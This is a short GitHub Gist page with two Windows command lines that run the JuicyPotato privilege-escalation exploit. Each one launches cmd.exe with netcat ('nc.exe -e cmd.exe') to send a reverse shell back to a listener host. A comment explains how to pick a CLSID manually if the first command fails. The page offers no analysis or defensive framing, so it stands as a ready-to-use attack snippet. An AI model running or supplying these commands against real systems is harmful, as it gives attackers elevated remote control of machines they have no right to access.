Last active
March 3, 2021 18:39
-
-
Save tanaka-geek/f7ebfc8f7660eb235aa636e4d4e6fa75 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
JuicyPotato.exe -t t -p C:\Windows\System32\cmd.exe -l 8888 -a "/c c:\Users\Public\Downloads\nc.exe -e cmd.exe 192.168.1.1 443" | |
# If this does not work, need to pick CLSID manually from | |
# http://ohpe.it/juicy-potato/CLSID/ | |
potato.exe -t t -p C:\Windows\System32\cmd.exe -l 8888 -a "/c c:\TEMP\nc.exe -e cmd.exe 192.168.1.1" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment